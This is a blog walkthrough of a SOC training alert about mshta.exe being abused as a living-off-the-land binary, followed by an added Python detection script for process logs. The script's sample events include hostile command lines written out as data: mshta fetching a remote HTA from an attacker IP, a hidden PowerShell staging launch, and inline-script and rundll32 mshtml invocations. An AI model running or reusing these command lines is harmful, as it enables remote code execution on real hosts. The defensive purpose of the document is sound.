Noel's Cyberkshetra Blogspace
SOC164 - Suspicious Mshta Behavior Alert

Analysis of the malicious nature of mshta.exe, a binary signed by Microsoft


Last updated 1 year ago

Hello, aspiring blue teamers. Hope you are keeping yourselves hale and hearty.

Welcome to this blog entry, in which we tackle the “SOC164 — Suspicious Mshta Behaviour” alert on the Let’s Defend platform. It was vastly different from the other alerts that I have previously solved on this platform.

Let’s jump headfirst into it.

NOTE: Always remember to investigate alerts from Let’s Defend, on a VM.

Introduction to the Alert

Alert particulars provided to the analyst:

Create the case

Start the playbook

What are Living-off-the-land binaries (LOLBins)?

A LoLBin is any binary supplied by the operating system that is normally used for legitimate purposes but can also be abused by malicious actors. Default system binaries have unexpected side effects, which may allow attackers to hide their activities post-exploitation. (Definition: talosintelligence.com)

Identify the Binary

Determine which binary is supplied by the operating system but is also home to suspicious activities. To do this, you can refer to the alert details on the Monitoring page or to Endpoint Security.

Determine Suspicious Activity

Previously, you found the related binary. Now, we’d like you to determine whether it was used for malicious purposes. You can use the LOLBAS Project to determine how a legitimate binary can be used to perform malicious activities.

There are some characteristics common to these command lines:

  • They often have a file path or other artifact as one of the arguments that changes based on the user environment or machine, such as usernames or system GUIDs in file paths.
  • The order of arguments in the command changes, or a single argument has a slightly different value.
  • They can have randomly generated strings in embedded URLs or file paths.
  • They can be obfuscated on purpose by attackers (variable assignment, invocation of string expressions created on the fly, etc.).

(list source: sophos.com)

Is the current activity suspicious?

Enumeration - About the binary

Before we start the investigation, let's try to learn more about the mshta.exe binary.

According to McAfee, it is a signed, native Microsoft binary that already exists on Windows and can execute code in a variety of ways; in today’s living-off-the-land culture that attackers love, this makes it a prime application of interest, since code execution can be proxied through it.

How does the binary operate?

According to Red Canary, there are four primary methods by which adversaries leverage Mshta to execute arbitrary VBScript and JScript:

  • Inline via an argument passed in the command line to Mshta
  • File-based execution via an HTML Application (HTA) file
  • COM-based execution for lateral movement
  • By calling the RunHTMLApplication export function of mshtml.dll with rundll32.exe as an alternative to mshta.exe

Let’s have a look at LOLBAS to identify any characteristics of the binary. Looking it up, we can find the execution methods it employs. They cover languages like JavaScript and VBScript.

Let's return to the platform.

Probing the process logs of the host, we can find that the binary mshta.exe did indeed run. An MD5 hash is attached to the instance.

MD5 Hash of .exe = 0b4340ed812dc82ce636c00fa5c9bef2

By analyzing the MD5 hash of the binary on VirusTotal, we can conclude that it is not associated with any malware strain. Joe Sandbox can attest to that claim.

We are given further evidence that the payload was run in CLI mode, aided by a PowerShell script (Ps1.hta).

Related hash of .ps1 = 6685c433705f558c5535789234db0e5a

Next, we proceed to check the 'Log Management' section to find any network traffic logs corresponding to the victim's IP.

We got 2 hits, but only 1 fit the bill. It seems the binary was accessed from the malicious IP 193.142.58.23.

When expanding the Process list, we can find an instance of Powershell being executed.

We read earlier that one of the methods by which mshta.exe operates is executing an HTA file. This means that mshta.exe is indeed being executed for malicious purposes.

Hence, we can mark it as Suspicious.

Event marked as suspicious
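As an added example (not code from the original post or from Let's Defend), the Python below turns the four execution methods listed under "How does the binary operate?" and the Sophos command-line characteristics into detection logic over process-creation events, including the mshta-to-PowerShell parent/child relationship found in the process list. The event format, PIDs, paths and command lines are constructed assumptions; only the 193.142.58.23 address is taken from this alert.

```python
import re

SCRIPT_HOSTS = ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")

# Constructed sample process-creation events (hypothetical, not from the Let's Defend
# case); only the 193.142.58.23 address reuses the value seen in the alert.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://193.142.58.23/Ps1.hta"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -WindowStyle Hidden -File C:\Users\Public\stage.ps1"},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta.exe vbscript:Execute("MsgBox ""hi"":close")'},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe mshtml.dll,RunHTMLApplication javascript:window.close()"},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\help.hta"},
]

def image_name(event):
    """Basename of the image path, lower-cased (Windows paths use backslashes)."""
    return str(event["image"]).rsplit("\\", 1)[-1].lower()

def classify_mshta(events):
    """Return (pid, rule) pairs for the mshta execution methods visible in process logs.
    COM-based lateral movement (method 3) leaves no command-line trace and is not covered."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name, low = image_name(e), str(e["cmdline"]).lower()
        if name == "mshta.exe":
            # Method 1: inline VBScript/JScript handed to mshta as its argument.
            if re.search(r"\b(vbscript|javascript):", low):
                findings.append((e["pid"], "mshta-inline-script"))
            # Method 2: an HTA file; a URL in the command line is the stronger signal.
            if re.search(r"https?://", low):
                findings.append((e["pid"], "mshta-remote-hta"))
            elif low.endswith(".hta"):
                findings.append((e["pid"], "mshta-local-hta"))
        # Method 4: RunHTMLApplication export of mshtml.dll reached via rundll32.exe.
        if name == "rundll32.exe" and "mshtml.dll" in low and "runhtmlapplication" in low:
            findings.append((e["pid"], "rundll32-mshtml-runhtmlapplication"))
        # Parent/child: a script host spawned by mshta, as seen with PowerShell in this alert.
        parent = by_pid.get(e["ppid"])
        if parent is not None and image_name(parent) == "mshta.exe" and name in SCRIPT_HOSTS:
            findings.append((e["pid"], "mshta-spawned-script-host"))
    return findings
```

Running `classify_mshta(SAMPLE_EVENTS)` flags the remote HTA fetch, the PowerShell child of mshta, the inline script, the rundll32 variant and, as a weaker signal, the local HTA; the plain explorer.exe event produces nothing.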

What is the Suspicious Activity?

What is the purpose of suspicious activities, performed with legal binaries for this incident?

From our initial research on the mshta binary, we found that it is mostly exploited to remotely execute HTML pages.

Let's select 'Execute' from the options above

Execute

Who Performed the Activity?

Who performed the suspicious/malicious activity using a binary? It would be helpful to check the binary’s parent process.

So the attack was supposedly done by a person (threat actor) and not by malicious software.

User

Containment

Please go to the “EDR” page and contain the user machine!

Let's proceed to contain the victim host.

We have successfully contained the host to prevent the spread of threats on the Let’s Defend network.

Add Artifacts

Let’s proceed to submit the evidence collected so far that is relevant to the attack.

Analyst's Notes

Finish the playbook

Close the alert

Alert Scorecard

This case was fascinating and I was double happy with the fact that I got all answers right!

Every alert solved is a step towards perfection and I am pretty happy with the score I received.

Summary of the alert

The SOC analyst was presented with a suspected binary file that was being used by threat actors to perform remote code execution. With the availability of network logs and command history from the victim host, we were able to find the attack vector (PowerShell CLI execution) used to conduct the remote attack.

Further analysis was performed on the binary file to find whether it had any links to existing malware. It was found that no such association existed. The vulnerability presented in this case was the use of binaries signed by trusted entities (in this case Microsoft), which were in turn being used by attackers to conduct attacks.

Conclusion

Thank you for reading this blog entry, and stay tuned as I try to close down more SOC alerts...

Your opinion matters

My audience has a voice. Feel free to reach out to me on my socials (links are at the top of this page) for any queries to be addressed. Dropping a sweet message would make my day.

